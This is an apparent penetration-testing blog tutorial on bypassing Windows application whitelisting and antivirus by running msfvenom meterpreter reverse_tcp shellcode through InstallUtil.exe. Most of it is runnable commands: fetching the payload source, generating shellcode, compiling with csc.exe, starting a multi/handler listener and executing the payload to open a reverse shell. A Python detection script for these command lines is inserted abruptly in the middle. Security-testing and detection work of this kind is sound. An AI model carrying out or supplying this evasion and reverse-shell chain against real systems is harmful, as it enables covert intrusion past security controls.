How to Bypass Application Whitelisting & AV

Brian Fehrman //

There are numerous methods that have been published to bypass Anti-Virus products. As a result, many companies are beginning to realize that application whitelisting is another tool to consider adding to their arsenal. Application whitelisting is advantageous in that it doesn’t require constant updating of behavioral or signature-based detection algorithms; you explicitly tell it what can be run. Here, we will show you one method of bypassing some application whitelisting products.

Right up front, we will make it known that we did not develop this method. This method was developed by Casey Smith (@subTee). We stumbled upon it and felt that it was so awesome that we had to share it.

This method makes use of two neat features on Windows. The first feature is the ability to compile C# programs without needing the Visual Studio environment. The second feature, which is the one for bypassing application whitelisting, leverages a tool named InstallUtil.exe.

The first task will be to grab the InstallUtil-ShellCode.cs CSharp file. It might be easiest to download it to a Kali box for now. The file can be found at the following location:

We’ve also created a TinyURL to the raw file so that it can be grabbed via wget:

        wget http://tinyurl.com/InstallUtil-ShellCode-cs

        mv InstallUtil-ShellCode-cs InstallUtil-ShellCode.cs

After downloading the CSharp file, it’s time to generate our shell code. We will use msfvenom to output a reverse_tcp meterpreter stager. Type the following, replacing YOUR_IP with the IP address of your Kali machine.

        msfvenom -p windows/meterpreter/reverse_tcp lhost=YOUR_IP lport=443 -f csharp > shellcode.txt

Now, copy the contents of the shellcode.txt file to your clipboard:

        cat shellcode.txt | xclip -selection clipboard

Open the InstallUtil-ShellCode.cs file for editing.

        gedit InstallUtil-ShellCode.cs &

Let’s take a minute to talk about the magic of this approach. In the InstallUtil-ShellCode.cs file, you will notice two functions towards the top. The function named Main (code in the green box) is what will be called if the program is executed normally (e.g., double-clicking, command line, sandboxing, etc.). The function named Uninstall (code in the orange box) will be executed when the program is run by using the InstallUtil.exe tool. The InstallUtil.exe tool is typically on the list of trusted applications and will likely bypass some application whitelisting software. The code within the Uninstall function will make a call to the Shellcode function, which is where our malicious code will reside. The magic here is that it can potentially be used to bypass both behavioral-based analysis and application whitelisting. With additional obfuscation, signature-based analysis can also be averted.

Find the portion of code shown in the picture below and replace it with the shell code that is currently on your clipboard (the output from shellcode.txt). Change the word “buf” in the newly pasted shell code to be “shellcode”.

Next, let’s get this file over to our Windows machine. Save the InstallUtil-ShellCode.cs file and exit gedit. In the same terminal window, type the following to host the InstallUtil-ShellCode.cs file:

        python -m SimpleHTTPServer 80

On your Windows machine, open a web browser and type the IP address of your Kali machine. Download the InstallUtil-ShellCode.cs file from the directory listing.

Let’s go ahead and compile the file using the csc.exe tool. Open a command prompt, change to your Downloads directory, and compile the program by typing the following:

        

        cd Downloads

        C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs

Hop back over to the Kali machine and let’s start a Meterpreter listener by using msfconsole. Kill the python server by hitting Ctrl-C in the terminal. Then, type the following (replacing YOUR_IP with your Kali IP address):

        msfconsole

        use multi/handler

        set payload windows/meterpreter/reverse_tcp

        set LHOST YOUR_IP

        set LPORT 443

        set ExitOnSession false

        run -j

Head back to the Windows terminal. Type the following to execute the shell code program by using the InstallUtil.exe tool:

        C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

Checking the Windows Task Manager shows that just the InstallUtil.exe process is present and not our exeshell.exe file.
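Because only InstallUtil.exe shows up as a process, the csc.exe and InstallUtil.exe command lines above are what a defender has to work with. The following is an added example, not code from the original post or from Casey Smith: it scores process-creation records for those two command lines, assuming records shaped like Sysmon Event ID 1 (`Image`, `CommandLine`, `CurrentDirectory`); the trusted-directory list, finding names and sample records are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumption: directories where legitimately installed assemblies live; tune per site.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

def _tokens(cmdline):
    """Split a Windows command line into lower-cased tokens, keeping quoted paths whole."""
    return [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def _trusted(path):
    return (path.rstrip("\\") + "\\").startswith(TRUSTED_DIRS)

def score_event(ev):
    """Return findings for one process-creation record (Sysmon Event ID 1 field names)."""
    image = PureWindowsPath(ev["Image"]).name.lower()
    args = _tokens(ev["CommandLine"])[1:]          # drop the executable itself
    cwd = ev.get("CurrentDirectory", "").lower()
    switches = [a for a in args if a.startswith(("/", "-"))]
    targets = [a for a in args if not a.startswith(("/", "-"))]
    findings = []
    if image == "installutil.exe":
        if any(s[1:] in ("u", "uninstall") for s in switches):
            findings.append("installutil-uninstall")
        # Empty /logfile= plus /LogToConsole=false leaves no install log or console output.
        if {"logfile=", "logtoconsole=false"} <= {s[1:] for s in switches}:
            findings.append("installutil-logging-suppressed")
        for t in targets:
            full = t if PureWindowsPath(t).is_absolute() else cwd.rstrip("\\") + "\\" + t
            if not _trusted(full):
                findings.append("installutil-target-outside-trusted-dir")
    elif image == "csc.exe":
        # /unsafe permits pointer code; flag it when compiling in a user-writable directory.
        if "/unsafe" in switches and not _trusted(cwd):
            findings.append("csc-unsafe-compile-outside-trusted-dir")
    return findings

FW = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\"
# Constructed sample records (not real telemetry); the first two use this page's command lines.
SAMPLE_EVENTS = [
    {"Image": FW + "csc.exe", "CurrentDirectory": "C:\\Users\\alice\\Downloads\\",
     "CommandLine": FW + "csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs"},
    {"Image": FW + "InstallUtil.exe", "CurrentDirectory": "C:\\Users\\alice\\Downloads\\",
     "CommandLine": FW + "InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe"},
    {"Image": FW + "InstallUtil.exe", "CurrentDirectory": "C:\\Windows\\system32\\",
     "CommandLine": FW + 'InstallUtil.exe "C:\\Program Files\\Vendor\\Service.exe"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(PureWindowsPath(ev["Image"]).name, score_event(ev))
```

These are heuristics: a legitimate service uninstall will also raise the first finding, so alert on the combination of findings rather than on any single one.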

Pop back into the Kali machine and check out the msfconsole window. Did you get a session?

In closing, we’ve shown you one way to potentially bypass application whitelisting software. The method was developed by Casey Smith (@subTee). The demo here looked at establishing a meterpreter session but the possibilities are endless for what code you can execute on the system. Being able to compile the code on a Windows system without the need for Visual Studio is also a huge bonus. This method can also be used to avoid both behavioral and signature-based anti-virus analysis. This is one approach that you will definitely want to keep in your tool box when it comes to assessing security tools.